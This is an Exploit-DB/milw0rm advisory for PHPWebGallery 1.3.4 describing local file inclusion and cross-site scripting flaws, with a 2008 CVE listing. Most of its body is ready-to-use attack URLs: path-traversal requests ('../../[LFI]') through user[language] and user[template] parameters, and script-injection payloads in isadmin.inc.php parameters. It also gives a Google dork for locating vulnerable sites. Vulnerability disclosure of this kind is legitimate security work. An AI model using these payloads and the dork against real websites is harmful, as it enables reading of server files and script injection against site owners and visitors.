PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion
Author: Khashayar Fereidani
type: webapps
platform: php
port:
date_added: 2008-09-10
date_updated: 2016-12-23
verified: 1
codes: OSVDB-49263;CVE-2008-4702;OSVDB-49262;CVE-2008-4591;OSVDB-49185
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comphpwebgallery-1.3.4.zip
----------------------------------------------------------------
Script : PhpWebGallery 1.3.4
Type : Multiple Vulnerabilities (XSS/LFI)
Rist : High
Google Dork : inurl:"picture.php?cat=" "Powered by PhpWebGallery 1.3.4"
----------------------------------------------------------------
Download From : http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Official Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Local File Inclusion Vulnerabilities :
Lfi 1 : http://example/include/init.inc.php?user[language]=../../[LFI]
Lfi 2 : http://example/include/init.inc.php?user[template]=../../[LFI]
Lfi 3 : http://example/include/isadmin.inc.php?user[language]=../../[LFI]
-----------------------------------------------------------------
Cross Site Scripting Vulnerabilities :
Xss 1 : http://example/admin/include/isadmin.inc.php?lang[access_forbiden]=<script>alert(123);</script>
Xss 2 : http://example/admin/include/isadmin.inc.php?lang[ident_title]=<script>alert(123);</script>
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
----------------------------------------------------------------
# milw0rm.com [2008-09-11]